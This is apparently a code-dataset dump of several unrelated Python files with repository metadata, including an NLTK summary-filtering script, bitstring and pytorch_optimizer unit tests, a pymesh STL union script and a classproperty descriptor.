        # reconstruct the session local path. As many jobs belong to the same session
        # cache the result
        if last_session != tdict['session']:
            ses = one.alyx.rest('sessions', 'list', django=f"pk,{tdict['session']}")[0]
            session_path = Path(subjects_path).joinpath(
                Path(ses['subject'], ses['start_time'][:10], str(ses['number']).zfill(3)))
            last_session = tdict['session']
        if dry:
            print(session_path, tdict['name'])
        else:
            task, dsets = tasks.run_alyx_task(tdict=tdict, session_path=session_path,
                                              one=one, **kwargs)
            if dsets:
                all_datasets.extend(dsets)
            c += 1
    return all_datasets
|
en
| 0.781282
|
# size_list = ['/dev/sdc1', '1921802500', '1427128132', '494657984', '75%', '/datadisk'] Get a few indicators and label the json field of the corresponding lab with them Server function that will look for creation flags and for each: 1) create the sessions on Alyx 2) register the corresponding raw data files on Alyx 3) create the tasks to be run on Alyx :param root_path: main path containing sessions or session path :param one :param dry :param rerun :param max_md5_size :return: # if the subject doesn't exist in the database, skip # only start extracting ephys on a raw_session.flag Function to be used as a process to run the jobs as they are created on the database THis will query waiting jobs from the specified Lab :param subjects_path: on servers: /mnt/s0/Data/Subjects. Contains sessions :param lab: lab name as per Alyx :param dry: :param count: :return: # if the lab is none, this will return empty tasks each time Function to run a list of tasks (task dictionary from Alyx query) on a local server :param subjects_path: :param tasks_dict: :param one: :param dry: :param count: maximum number of tasks to run :param time_out: between each task, if time elapsed is greater than time out, returns (seconds) :param kwargs: :return: list of dataset dictionaries # if the count is reached or if the time_out has been elapsed, break the loop and return # reconstruct the session local path. As many jobs belong to the same session # cache the result
| 1.944533
| 2
|
scripts/goodSummaries.py
|
olizhu10/newsroom
| 0
|
6628063
|
<gh_stars>0
import sys
import jsonl
from multiprocessing import Pool
from threading import Lock
from tqdm import tqdm
import nltk
from nltk.tokenize import word_tokenize
from nltk.tag import pos_tag
import json
def preprocess(sent):
    """Tokenize *sent* with NLTK and return its POS-tagged token list."""
    return nltk.pos_tag(nltk.word_tokenize(sent))
# Cluster membership lists and the full training set are loaded once at
# import time and shared (read-only) with the worker processes.
with jsonl.open('../clustering/final_clusters_cleaned0.9_2.jsonl') as f:
    clusters = f.read()
with jsonl.open('../dataset_files/train.jsonl.gz', gzip=True) as ds:
    articles = ds.read()
def createDictionary():
    """Creates dictionary for entire dataset with article archives as keys and
    (summary, text) as values."""
    # Renamed the local from ``dict`` to avoid shadowing the builtin.
    archive_map = {}
    pbar = tqdm(total=len(articles), desc='Generating Dictionary:')
    for article in articles:
        archive_map[article['archive']] = (article['summary'], article['text'])
        pbar.update(1)
    return archive_map
def namesList(sentence):
    """Return the lower-cased proper nouns (NNP-tagged tokens) of *sentence*."""
    return [token.lower() for token, tag in preprocess(sentence) if tag == "NNP"]
def fullList(sentence):
    """Return every token of *sentence*, lower-cased."""
    return [token.lower() for token, _tag in preprocess(sentence)]
def nameDifferences(summaryList, articleList):
    """Return True when every word of *summaryList* also occurs in
    *articleList*, else False.

    Despite the name, no difference list is computed -- the original built an
    unused ``diffList`` local, which is removed here.
    """
    # Set membership is O(1) instead of O(len(articleList)) per word.
    article_words = set(articleList)
    return all(word in article_words for word in summaryList)
def namesListList(list):
    """Map namesList over a list of sentences."""
    return [namesList(sentence) for sentence in list]
def fullListList(list):
    """Map fullList over a list of sentences."""
    return [fullList(sentence) for sentence in list]
dict = createDictionary()  # NOTE(review): shadows the builtin ``dict`` module-wide
def analyzeCluster(x):
    """For cluster *x*, return a mapping from an article's archive key to the
    archives of cluster summaries whose proper nouns all occur in that
    article, keeping only articles with at least 4 matching summaries."""
    smallDict = {}
    articleList = []
    summaryList = []
    for article in clusters[x]:
        # Keep only sizeable pairs: >= 50 article tokens and >= 5 summary tokens.
        if(len(preprocess(dict[article][1]))>=50 and len(preprocess(dict[article][0]))>=5):
            articleList.append(dict[article][1])
            summaryList.append(dict[article][0])
    articleList = fullListList(articleList)
    summaryList = namesListList(summaryList)
    for aIndex, article in enumerate(articleList, start = 0):
        summaries = []
        for sIndex, summary in enumerate(summaryList, start = 0):
            # A summary matches when all its proper nouns appear in the article;
            # an article always matches its own summary (aIndex == sIndex).
            if(nameDifferences(summary, article) or aIndex == sIndex):
                summaries.append(clusters[x][sIndex])
        if len(summaries)>=4:
            smallDict[clusters[x][aIndex]] = summaries
    return smallDict
def main():
    """Fan analyzeCluster over all clusters in a process pool and dump the
    merged article -> summaries mapping to JSON."""
    articleDict = {}
    pbar = tqdm(total=len(clusters), desc='Going through Clusters:')
    qbar = tqdm(total=70000, desc='Good articles found with >=4 summaries:')
    with Pool(processes=15) as pool:
        # imap_unordered keeps all 15 workers busy; merge order is irrelevant
        # because each cluster contributes distinct archive keys.
        for smallDict in pool.imap_unordered(analyzeCluster, range(len(clusters))):
            for key in smallDict:
                articleDict[key] = smallDict[key]
                qbar.update(1)
            pbar.update(1)
    with open('../clustering/articleSummaryPairsMinLength.json', 'w+') as file:
        json.dump(articleDict, file)
if __name__ == '__main__':
    main()
|
# NOTE(review): byte-identical duplicate of the goodSummaries script above
# (the dataset dump stores each file twice); see the annotated first copy.
import sys
import jsonl
from multiprocessing import Pool
from threading import Lock
from tqdm import tqdm
import nltk
from nltk.tokenize import word_tokenize
from nltk.tag import pos_tag
import json
def preprocess(sent):
    sent = nltk.word_tokenize(sent)
    sent = nltk.pos_tag(sent)
    return sent
with jsonl.open('../clustering/final_clusters_cleaned0.9_2.jsonl') as f:
    clusters = f.read()
with jsonl.open('../dataset_files/train.jsonl.gz', gzip=True) as ds:
    articles = ds.read()
def createDictionary():
    """Creates dictionary for entire dataset with article archives as keys and
    (summary, text) as values."""
    dict = {}
    pbar = tqdm(total=len(articles), desc='Generating Dictionary:')
    for article in articles:
        dict[article['archive']]=(article['summary'],article['text'])
        pbar.update(1)
    return dict
def namesList(sentence):
    nList = []
    for word in preprocess(sentence):
        if word[1]=="NNP":
            nList.append(word[0].lower())
    return nList
def fullList(sentence):
    nList = []
    for word in preprocess(sentence):
        nList.append(word[0].lower())
    return nList
def nameDifferences(summaryList, articleList):
    diffList = []
    for word in summaryList:
        if not (word in articleList):
            return False
    return True
def namesListList(list):
    nList = []
    for sentence in list:
        nList.append(namesList(sentence))
    return nList
def fullListList(list):
    nList = []
    for sentence in list:
        nList.append(fullList(sentence))
    return nList
dict = createDictionary()
def analyzeCluster(x):
    smallDict = {}
    articleList = []
    summaryList = []
    for article in clusters[x]:
        if(len(preprocess(dict[article][1]))>=50 and len(preprocess(dict[article][0]))>=5):
            articleList.append(dict[article][1])
            summaryList.append(dict[article][0])
    articleList = fullListList(articleList)
    summaryList = namesListList(summaryList)
    for aIndex, article in enumerate(articleList, start = 0):
        summaries = []
        for sIndex, summary in enumerate(summaryList, start = 0):
            if(nameDifferences(summary, article) or aIndex == sIndex):
                summaries.append(clusters[x][sIndex])
        if len(summaries)>=4:
            smallDict[clusters[x][aIndex]] = summaries
    return smallDict
def main():
    articleDict = {}
    pbar = tqdm(total=len(clusters), desc='Going through Clusters:')
    qbar = tqdm(total=70000, desc='Good articles found with >=4 summaries:')
    with Pool(processes=15) as pool:
        for smallDict in pool.imap_unordered(analyzeCluster, range(len(clusters))):
            for key in smallDict:
                articleDict[key] = smallDict[key]
                qbar.update(1)
            pbar.update(1)
    with open('../clustering/articleSummaryPairsMinLength.json', 'w+') as file:
        json.dump(articleDict, file)
if __name__ == '__main__':
    main()
|
en
| 0.933228
|
Creates dictionary for entire dataset with article archives as keys and
(summary, text) as values.
| 2.535152
| 3
|
scripts/rig/show_dataset_image.py
|
Asap7772/railrl_evalsawyer
| 1
|
6628064
|
<gh_stars>1-10
import argparse
import uuid
import cv2
import numpy as np
filename = str(uuid.uuid4())
def vis(args):
    """Display every image observation stored in the .npy file args.file."""
    imgs = np.load(args.file)
    for image_obs in imgs:
        # 6912 == 3 * 48 * 48; otherwise assume a flattened 3 * 84 * 84 image.
        # NOTE(review): .transpose() reverses all axes, presumably turning the
        # (C, H, W) layout into (W, H, C) for cv2.imshow -- confirm intent.
        if image_obs.size == 6912:
            im = image_obs.reshape(3, 48, 48).transpose()
        else:
            im = image_obs.reshape(3, 84, 84).transpose()
        cv2.imshow('img', im)
        cv2.waitKey(10)
if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument('file', type=str,
                        help='path to the snapshot file')
    args = parser.parse_args()
    vis(args)
|
# NOTE(review): byte-identical duplicate of the visualization script above
# (the dataset dump stores each file twice); see the annotated first copy.
import argparse
import uuid
import cv2
import numpy as np
filename = str(uuid.uuid4())
def vis(args):
    imgs = np.load(args.file)
    for image_obs in imgs:
        if image_obs.size == 6912:
            im = image_obs.reshape(3, 48, 48).transpose()
        else:
            im = image_obs.reshape(3, 84, 84).transpose()
        cv2.imshow('img', im)
        cv2.waitKey(10)
if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument('file', type=str,
                        help='path to the snapshot file')
    args = parser.parse_args()
    vis(args)
|
none
| 1
| 2.79777
| 3
|
|
test/test_bitstring.py
|
oittaa/bitstring
| 0
|
6628065
|
<filename>test/test_bitstring.py
#!/usr/bin/env python
"""
Module-level unit tests.
"""
import copy
import unittest
import bitstring
class ModuleData(unittest.TestCase):
    """Module metadata: version string, public API surface and helper tables."""
    def testVersion(self):
        self.assertEqual(bitstring.__version__, "3.1.9")
    def testAll(self):
        # __all__ must expose exactly this public API, nothing more or less.
        exported = [
            "ConstBitArray",
            "ConstBitStream",
            "BitStream",
            "BitArray",
            "Bits",
            "BitString",
            "pack",
            "Error",
            "ReadError",
            "InterpretError",
            "ByteAlignError",
            "CreationError",
            "bytealigned",
            "set_lsb0",
            "set_msb0",
        ]
        self.assertEqual(set(bitstring.__all__), set(exported))
    def testReverseDict(self):
        # BYTE_REVERSAL_DICT maps each byte value to its bit-reversed byte.
        d = bitstring.BYTE_REVERSAL_DICT
        for i in range(256):
            a = bitstring.Bits(uint=i, length=8)
            b = d[i]
            self.assertEqual(a.bin[::-1], bitstring.Bits(bytes=b).bin)
    def testAliases(self):
        # Legacy class names must remain aliases of the current classes.
        self.assertTrue(bitstring.Bits is bitstring.ConstBitArray)
        self.assertTrue(bitstring.BitStream is bitstring.BitString)
class MemoryUsage(unittest.TestCase):
    """Rough per-object size expectations (skipped when pympler is absent)."""
    def testBaselineMemory(self):
        try:
            import pympler.asizeof.asizeof as size
        except ImportError:
            return
        # These values might be platform dependent, so don't fret too much.
        self.assertEqual(size(bitstring.ConstBitStream([0])), 64)
        self.assertEqual(size(bitstring.Bits([0])), 64)
        self.assertEqual(size(bitstring.BitStream([0])), 64)
        self.assertEqual(size(bitstring.BitArray([0])), 64)
        from bitstring.bitstore import ByteStore
        self.assertEqual(size(ByteStore(bytearray())), 100)
class Copy(unittest.TestCase):
    """copy.copy semantics: immutable types may share, mutable ones must not."""
    def testConstBitArrayCopy(self):
        import copy
        # Immutable, so copying may return the very same object.
        cba = bitstring.Bits(100)
        cba_copy = copy.copy(cba)
        self.assertTrue(cba is cba_copy)
    def testBitArrayCopy(self):
        # Mutable, so the copy must own a distinct datastore.
        ba = bitstring.BitArray(100)
        ba_copy = copy.copy(ba)
        self.assertFalse(ba is ba_copy)
        self.assertFalse(ba._datastore is ba_copy._datastore)
        self.assertTrue(ba == ba_copy)
    def testConstBitStreamCopy(self):
        # Copying resets the read position but may share the immutable data.
        cbs = bitstring.ConstBitStream(100)
        cbs.pos = 50
        cbs_copy = copy.copy(cbs)
        self.assertEqual(cbs_copy.pos, 0)
        self.assertTrue(cbs._datastore is cbs_copy._datastore)
        self.assertTrue(cbs == cbs_copy)
    def testBitStreamCopy(self):
        # Mutable stream: position resets and the datastore is duplicated.
        bs = bitstring.BitStream(100)
        bs.pos = 50
        bs_copy = copy.copy(bs)
        self.assertEqual(bs_copy.pos, 0)
        self.assertFalse(bs._datastore is bs_copy._datastore)
        self.assertTrue(bs == bs_copy)
class Interning(unittest.TestCase):
    """Bits literals are interned per construction string; streams are not."""
    def testBits(self):
        a = bitstring.Bits("0xf")
        b = bitstring.Bits("0xf")
        self.assertTrue(a is b)
        # Equal value built from a different literal is a distinct object.
        c = bitstring.Bits("0b1111")
        self.assertFalse(a is c)
    def testCBS(self):
        a = bitstring.ConstBitStream("0b11000")
        b = bitstring.ConstBitStream("0b11000")
        self.assertFalse(a is b)
class LSB0(unittest.TestCase):
    """The module-wide bit-numbering switch (set_lsb0 / set_msb0)."""
    def testGettingAndSetting(self):
        self.assertEqual(bitstring._lsb0, False)
        bitstring.set_lsb0()
        self.assertEqual(bitstring._lsb0, True)
        bitstring.set_lsb0(False)
        self.assertEqual(bitstring._lsb0, False)
        bitstring.set_msb0(False)
        self.assertEqual(bitstring._lsb0, True)
        bitstring.set_msb0()
        self.assertEqual(bitstring._lsb0, False)
|
<filename>test/test_bitstring.py
#!/usr/bin/env python
"""
Module-level unit tests.
"""
import copy
import unittest
import bitstring
# NOTE(review): byte-identical duplicate of the bitstring test classes above
# (the dataset dump stores each file twice); see the annotated first copy.
class ModuleData(unittest.TestCase):
    def testVersion(self):
        self.assertEqual(bitstring.__version__, "3.1.9")
    def testAll(self):
        exported = [
            "ConstBitArray",
            "ConstBitStream",
            "BitStream",
            "BitArray",
            "Bits",
            "BitString",
            "pack",
            "Error",
            "ReadError",
            "InterpretError",
            "ByteAlignError",
            "CreationError",
            "bytealigned",
            "set_lsb0",
            "set_msb0",
        ]
        self.assertEqual(set(bitstring.__all__), set(exported))
    def testReverseDict(self):
        d = bitstring.BYTE_REVERSAL_DICT
        for i in range(256):
            a = bitstring.Bits(uint=i, length=8)
            b = d[i]
            self.assertEqual(a.bin[::-1], bitstring.Bits(bytes=b).bin)
    def testAliases(self):
        self.assertTrue(bitstring.Bits is bitstring.ConstBitArray)
        self.assertTrue(bitstring.BitStream is bitstring.BitString)
class MemoryUsage(unittest.TestCase):
    def testBaselineMemory(self):
        try:
            import pympler.asizeof.asizeof as size
        except ImportError:
            return
        # These values might be platform dependent, so don't fret too much.
        self.assertEqual(size(bitstring.ConstBitStream([0])), 64)
        self.assertEqual(size(bitstring.Bits([0])), 64)
        self.assertEqual(size(bitstring.BitStream([0])), 64)
        self.assertEqual(size(bitstring.BitArray([0])), 64)
        from bitstring.bitstore import ByteStore
        self.assertEqual(size(ByteStore(bytearray())), 100)
class Copy(unittest.TestCase):
    def testConstBitArrayCopy(self):
        import copy
        cba = bitstring.Bits(100)
        cba_copy = copy.copy(cba)
        self.assertTrue(cba is cba_copy)
    def testBitArrayCopy(self):
        ba = bitstring.BitArray(100)
        ba_copy = copy.copy(ba)
        self.assertFalse(ba is ba_copy)
        self.assertFalse(ba._datastore is ba_copy._datastore)
        self.assertTrue(ba == ba_copy)
    def testConstBitStreamCopy(self):
        cbs = bitstring.ConstBitStream(100)
        cbs.pos = 50
        cbs_copy = copy.copy(cbs)
        self.assertEqual(cbs_copy.pos, 0)
        self.assertTrue(cbs._datastore is cbs_copy._datastore)
        self.assertTrue(cbs == cbs_copy)
    def testBitStreamCopy(self):
        bs = bitstring.BitStream(100)
        bs.pos = 50
        bs_copy = copy.copy(bs)
        self.assertEqual(bs_copy.pos, 0)
        self.assertFalse(bs._datastore is bs_copy._datastore)
        self.assertTrue(bs == bs_copy)
class Interning(unittest.TestCase):
    def testBits(self):
        a = bitstring.Bits("0xf")
        b = bitstring.Bits("0xf")
        self.assertTrue(a is b)
        c = bitstring.Bits("0b1111")
        self.assertFalse(a is c)
    def testCBS(self):
        a = bitstring.ConstBitStream("0b11000")
        b = bitstring.ConstBitStream("0b11000")
        self.assertFalse(a is b)
class LSB0(unittest.TestCase):
    def testGettingAndSetting(self):
        self.assertEqual(bitstring._lsb0, False)
        bitstring.set_lsb0()
        self.assertEqual(bitstring._lsb0, True)
        bitstring.set_lsb0(False)
        self.assertEqual(bitstring._lsb0, False)
        bitstring.set_msb0(False)
        self.assertEqual(bitstring._lsb0, True)
        bitstring.set_msb0()
        self.assertEqual(bitstring._lsb0, False)
|
en
| 0.69183
|
#!/usr/bin/env python Module-level unit tests. # These values might be platform dependent, so don't fret too much.
| 2.734505
| 3
|
extra/mesh_repair/repair_mesh.py
|
digisomni/character-creator-1
| 17
|
6628066
|
#!/usr/bin/env python
"""STL union script using pymesh"""
__author__ = "<NAME>, <EMAIL>"
__license__ = "MIT"
__date__ = "05/09/2018"
# Usage:
# docker run -it --rm -v `pwd`:/root `meshes`:/meshes qnzhou/pymesh python repair_mesh.py -v
## Libraries -------------------
import time
import pymesh
import numpy as np
from numpy.linalg import norm
## Functions -------------------
def load_mesh(fileName):
    '''Load the STL file "/meshes/<fileName>.stl" with pymesh.'''
    # Dropped the stray trailing semicolon of the original.
    return pymesh.load_mesh("/meshes/" + fileName + ".stl")
def mesh_union(meshA, meshB):
    '''Mesh union between meshA and meshB, needs to be intersecting faces'''
    # Boolean union computed with the libigl ("igl") engine.
    return pymesh.boolean(meshA, meshB, operation="union", engine="igl")
start_time = time.time()
## Opening up the files -------------------
ArmR = load_mesh("mesh-arm-r")
HandR = load_mesh("mesh-hand-r")
ArmL = load_mesh("mesh-arm-l")
HandL = load_mesh("mesh-hand-l")
Head = load_mesh("mesh-head")
LegL = load_mesh("mesh-leg-l")
FootL = load_mesh("mesh-foot-l")
LegR = load_mesh("mesh-leg-r")
FootR = load_mesh("mesh-foot-r")
Torso = load_mesh("mesh-torso")
Stand = load_mesh("stand")
## Unions -------------------
# NOTE(review): parts appear grouped so that meshes within each group do not
# intersect each other, leaving a single boolean union between the two groups
# to weld all seams at once -- confirm against the source models.
A = pymesh.merge_meshes([HandR, HandL, FootR, FootL, Torso])
B = pymesh.merge_meshes([ArmR, ArmL, Head, LegL, LegR, Stand])
Output = mesh_union(A, B)
pymesh.save_mesh("/meshes/myCharacter.stl", Output)
print("Mesh merged successfully!")
print("--- %s seconds ---" % (time.time() - start_time))
|
#!/usr/bin/env python
# NOTE(review): byte-identical duplicate of the repair_mesh script above
# (the dataset dump stores each file twice); see the annotated first copy.
"""STL union script using pymesh"""
__author__ = "<NAME>, <EMAIL>"
__license__ = "MIT"
__date__ = "05/09/2018"
# Usage:
# docker run -it --rm -v `pwd`:/root `meshes`:/meshes qnzhou/pymesh python repair_mesh.py -v
## Libraries -------------------
import time
import pymesh
import numpy as np
from numpy.linalg import norm
## Functions -------------------
def load_mesh(fileName):
    '''loading mesh using pymesh'''
    return pymesh.load_mesh("/meshes/"+fileName+".stl");
def mesh_union(meshA, meshB):
    '''Mesh union between meshA and meshB, needs to be intersecting faces'''
    return pymesh.boolean(meshA, meshB, operation="union", engine="igl")
start_time = time.time()
## Opening up the files -------------------
ArmR = load_mesh("mesh-arm-r")
HandR = load_mesh("mesh-hand-r")
ArmL = load_mesh("mesh-arm-l")
HandL = load_mesh("mesh-hand-l")
Head = load_mesh("mesh-head")
LegL = load_mesh("mesh-leg-l")
FootL = load_mesh("mesh-foot-l")
LegR = load_mesh("mesh-leg-r")
FootR = load_mesh("mesh-foot-r")
Torso = load_mesh("mesh-torso")
Stand = load_mesh("stand")
## Unions -------------------
A = pymesh.merge_meshes([HandR, HandL, FootR, FootL, Torso])
B = pymesh.merge_meshes([ArmR, ArmL, Head, LegL, LegR, Stand])
Output = mesh_union(A, B)
pymesh.save_mesh("/meshes/myCharacter.stl", Output)
print("Mesh merged successfully!")
print("--- %s seconds ---" % (time.time() - start_time))
|
en
| 0.367603
|
#!/usr/bin/env python STL union script using pymesh # Usage: # docker run -it --rm -v `pwd`:/root `meshes`:/meshes qnzhou/pymesh python repair_mesh.py -v ## Libraries ------------------- ## Functions ------------------- loading mesh using pymesh Mesh union between meshA and meshB, needs to be intersecting faces ## Opening up the files ------------------- ## Unions -------------------
| 2.475365
| 2
|
tests/test_utils.py
|
kozistr/pytorch_optimizer
| 20
|
6628067
|
from typing import List
import numpy as np
import pytest
import torch
from torch import nn
from pytorch_optimizer.utils import (
clip_grad_norm,
get_optimizer_parameters,
has_overflow,
is_valid_parameters,
neuron_mean,
neuron_norm,
normalize_gradient,
unit_norm,
)
from tests.utils import Example
def test_has_overflow():
    """has_overflow flags inf and NaN and accepts a finite tensor."""
    assert has_overflow(np.inf)
    assert has_overflow(np.nan)
    assert not has_overflow(torch.Tensor([1]))
def test_normalized_gradient():
    """normalize_gradient matches reference values, with and without
    per-channel normalization (use_channels=True)."""
    x = torch.arange(0, 10, dtype=torch.float32)
    np.testing.assert_allclose(
        normalize_gradient(x).numpy(),
        np.asarray([0.0000, 0.3303, 0.6606, 0.9909, 1.3212, 1.6514, 1.9817, 2.3120, 2.6423, 2.9726]),
        rtol=1e-4,
        atol=1e-4,
    )
    np.testing.assert_allclose(
        normalize_gradient(x.view(1, 10), use_channels=True).numpy(),
        np.asarray([[0.0000, 0.3303, 0.6606, 0.9909, 1.3212, 1.6514, 1.9817, 2.3120, 2.6423, 2.9726]]),
        rtol=1e-4,
        atol=1e-4,
    )
def test_clip_grad_norm():
    """clip_grad_norm returns the total gradient norm.

    NOTE(review): the same expected value for max_norm=2 implies the
    returned norm is measured before clipping -- verify against the
    implementation.
    """
    x = torch.arange(0, 10, dtype=torch.float32, requires_grad=True)
    x.grad = torch.arange(0, 10, dtype=torch.float32)
    np.testing.assert_approx_equal(clip_grad_norm(x), 16.881943016134134, significant=4)
    np.testing.assert_approx_equal(clip_grad_norm(x, max_norm=2), 16.881943016134134, significant=4)
def test_unit_norm():
    """unit_norm yields the same norm (||0..9|| = 16.8819) regardless of
    trailing singleton dimensions."""
    x = torch.arange(0, 10, dtype=torch.float32)
    np.testing.assert_approx_equal(unit_norm(x).numpy(), 16.8819, significant=4)
    np.testing.assert_approx_equal(unit_norm(x.view(1, 10)).numpy(), 16.8819, significant=4)
    np.testing.assert_approx_equal(unit_norm(x.view(1, 10, 1, 1)).numpy(), 16.8819, significant=4)
    np.testing.assert_approx_equal(unit_norm(x.view(1, 10, 1, 1, 1, 1)).numpy(), 16.8819, significant=4)
def test_neuron_mean_norm():
    """neuron_mean rejects 1-D input; neuron_norm reduces to absolute
    values for vectors and column vectors."""
    x = torch.arange(-5, 5, dtype=torch.float32)
    # neuron_mean requires at least a 2-D tensor.
    with pytest.raises(ValueError):
        neuron_mean(x)
    np.testing.assert_array_equal(
        neuron_mean(x.view(-1, 1)).numpy(),
        np.asarray([[-5.0], [-4.0], [-3.0], [-2.0], [-1.0], [0.0], [1.0], [2.0], [3.0], [4.0]]),
    )
    np.testing.assert_array_equal(
        neuron_norm(x).numpy(), np.asarray([5.0, 4.0, 3.0, 2.0, 1.0, 0.0, 1.0, 2.0, 3.0, 4.0])
    )
    np.testing.assert_array_equal(
        neuron_norm(x.view(-1, 1)).numpy(),
        np.asarray([[5.0], [4.0], [3.0], [2.0], [1.0], [0.0], [1.0], [2.0], [3.0], [4.0]]),
    )
def test_get_optimizer_parameters():
    """Parameters matching the weight-decay ban list get weight_decay 0."""
    model: nn.Module = Example()
    wd_ban_list: List[str] = ['bias', 'LayerNorm.bias', 'LayerNorm.weight']
    before_parameters = list(model.named_parameters())
    after_parameters = get_optimizer_parameters(model, weight_decay=1e-3, wd_ban_list=wd_ban_list)
    for before, after in zip(before_parameters, after_parameters):
        layer_name: str = before[0]
        # Banned layers (substring 'bias' or exact ban-list match) must be
        # excluded from weight decay.
        if layer_name.find('bias') != -1 or layer_name in wd_ban_list:
            assert after['weight_decay'] == 0.0
def test_is_valid_parameters():
    """get_optimizer_parameters output passes is_valid_parameters."""
    model: nn.Module = Example()
    wd_ban_list: List[str] = ['bias', 'LayerNorm.bias', 'LayerNorm.weight']
    after_parameters = get_optimizer_parameters(model, weight_decay=1e-3, wd_ban_list=wd_ban_list)
    assert is_valid_parameters(after_parameters)
|
from typing import List
import numpy as np
import pytest
import torch
from torch import nn
from pytorch_optimizer.utils import (
clip_grad_norm,
get_optimizer_parameters,
has_overflow,
is_valid_parameters,
neuron_mean,
neuron_norm,
normalize_gradient,
unit_norm,
)
from tests.utils import Example
def test_has_overflow():
assert has_overflow(np.inf)
assert has_overflow(np.nan)
assert not has_overflow(torch.Tensor([1]))
def test_normalized_gradient():
x = torch.arange(0, 10, dtype=torch.float32)
np.testing.assert_allclose(
normalize_gradient(x).numpy(),
np.asarray([0.0000, 0.3303, 0.6606, 0.9909, 1.3212, 1.6514, 1.9817, 2.3120, 2.6423, 2.9726]),
rtol=1e-4,
atol=1e-4,
)
np.testing.assert_allclose(
normalize_gradient(x.view(1, 10), use_channels=True).numpy(),
np.asarray([[0.0000, 0.3303, 0.6606, 0.9909, 1.3212, 1.6514, 1.9817, 2.3120, 2.6423, 2.9726]]),
rtol=1e-4,
atol=1e-4,
)
def test_clip_grad_norm():
x = torch.arange(0, 10, dtype=torch.float32, requires_grad=True)
x.grad = torch.arange(0, 10, dtype=torch.float32)
np.testing.assert_approx_equal(clip_grad_norm(x), 16.881943016134134, significant=4)
np.testing.assert_approx_equal(clip_grad_norm(x, max_norm=2), 16.881943016134134, significant=4)
def test_unit_norm():
x = torch.arange(0, 10, dtype=torch.float32)
np.testing.assert_approx_equal(unit_norm(x).numpy(), 16.8819, significant=4)
np.testing.assert_approx_equal(unit_norm(x.view(1, 10)).numpy(), 16.8819, significant=4)
np.testing.assert_approx_equal(unit_norm(x.view(1, 10, 1, 1)).numpy(), 16.8819, significant=4)
np.testing.assert_approx_equal(unit_norm(x.view(1, 10, 1, 1, 1, 1)).numpy(), 16.8819, significant=4)
def test_neuron_mean_norm():
x = torch.arange(-5, 5, dtype=torch.float32)
with pytest.raises(ValueError):
neuron_mean(x)
np.testing.assert_array_equal(
neuron_mean(x.view(-1, 1)).numpy(),
np.asarray([[-5.0], [-4.0], [-3.0], [-2.0], [-1.0], [0.0], [1.0], [2.0], [3.0], [4.0]]),
)
np.testing.assert_array_equal(
neuron_norm(x).numpy(), np.asarray([5.0, 4.0, 3.0, 2.0, 1.0, 0.0, 1.0, 2.0, 3.0, 4.0])
)
np.testing.assert_array_equal(
neuron_norm(x.view(-1, 1)).numpy(),
np.asarray([[5.0], [4.0], [3.0], [2.0], [1.0], [0.0], [1.0], [2.0], [3.0], [4.0]]),
)
def test_get_optimizer_parameters():
model: nn.Module = Example()
wd_ban_list: List[str] = ['bias', 'LayerNorm.bias', 'LayerNorm.weight']
before_parameters = list(model.named_parameters())
after_parameters = get_optimizer_parameters(model, weight_decay=1e-3, wd_ban_list=wd_ban_list)
for before, after in zip(before_parameters, after_parameters):
layer_name: str = before[0]
if layer_name.find('bias') != -1 or layer_name in wd_ban_list:
assert after['weight_decay'] == 0.0
def test_is_valid_parameters():
model: nn.Module = Example()
wd_ban_list: List[str] = ['bias', 'LayerNorm.bias', 'LayerNorm.weight']
after_parameters = get_optimizer_parameters(model, weight_decay=1e-3, wd_ban_list=wd_ban_list)
assert is_valid_parameters(after_parameters)
|
none
| 1
| 2.402151
| 2
|
|
geodeconstructor/tools.py
|
ThomasVieth/geodeconstructor
| 0
|
6628068
|
"""
"""
## python imports
from functools import wraps
## __all__ declaration
__all__ = (
"classproperty",
)
## classproperty declaration
class classproperty(property):
    """A descriptor for a class rather than an object/instance. Used by
    decorating a class method with no parameters. Acts similarly to the
    builtin property descriptor and uses `functools.wraps` to maintain
    documentation.

    With ``lazy=True`` the computed value is cached per owner class.
    """
    def __new__(cls, fget=None, doc=None, lazy=False):
        # Support parameterised use -- @classproperty(lazy=True) -- by
        # returning a decorator when called without a getter.
        if fget is None:
            def wrapper(func):
                return cls(func, lazy=lazy)
            return wrapper
        return super().__new__(cls)
    def __init__(self, fget, doc=None, lazy=False):
        self._lazy = lazy
        if lazy:
            # Per-class cache of computed values (owner class -> value).
            self._cache = {}
        fget = self._wrap_fget(fget)
        super().__init__(fget=fget, doc=doc)
    def __get__(self, obj, objtype):
        # Serve the memoised value for this class when lazy.
        if self._lazy and objtype in self._cache:
            return self._cache[objtype]
        # Call the original (unwrapped) getter with the class, bypassing
        # the instance-oriented wrapper installed in __init__.
        val = self.fget.__wrapped__(objtype)
        if self._lazy:
            self._cache[objtype] = val
        return val
    def getter(self, fget):
        # Re-wrap replacement getters so they also receive the class.
        return super().getter(self._wrap_fget(fget))
    @staticmethod
    def _wrap_fget(orig_fget):
        # Accept either a plain function or a classmethod-wrapped one.
        if isinstance(orig_fget, classmethod):
            orig_fget = orig_fget.__func__
        @wraps(orig_fget)
        def fget(obj):
            # property calls fget(instance); forward the class instead.
            return orig_fget(obj.__class__)
        return fget
|
"""
"""
## python imports
from functools import wraps
## __all__ declaration
__all__ = (
"classproperty",
)
## classproperty declaration
class classproperty(property):
"""A descriptor for a class rather than an object/instance. Used by
decorating an class method with no parameters. Acting similarly to the
property descriptor builtin and uses `functools.wraps` to maintain
documentation.
"""
def __new__(cls, fget=None, doc=None, lazy=False):
if fget is None:
def wrapper(func):
return cls(func, lazy=lazy)
return wrapper
return super().__new__(cls)
def __init__(self, fget, doc=None, lazy=False):
self._lazy = lazy
if lazy:
self._cache = {}
fget = self._wrap_fget(fget)
super().__init__(fget=fget, doc=doc)
def __get__(self, obj, objtype):
if self._lazy and objtype in self._cache:
return self._cache[objtype]
val = self.fget.__wrapped__(objtype)
if self._lazy:
self._cache[objtype] = val
return val
def getter(self, fget):
return super().getter(self._wrap_fget(fget))
@staticmethod
def _wrap_fget(orig_fget):
if isinstance(orig_fget, classmethod):
orig_fget = orig_fget.__func__
@wraps(orig_fget)
def fget(obj):
return orig_fget(obj.__class__)
return fget
|
en
| 0.687564
|
## python imports ## __all__ declaration ## classproperty declaration A descriptor for a class rather than an object/instance. Used by decorating an class method with no parameters. Acting similarly to the property descriptor builtin and uses `functools.wraps` to maintain documentation.
| 3.268927
| 3
|
src/ll4ma_kdl/scripts/test_hand_model.py
|
NYU-robot-learning/Allegro-Hand-Controller-DIME
| 0
|
6628069
|
<reponame>NYU-robot-learning/Allegro-Hand-Controller-DIME
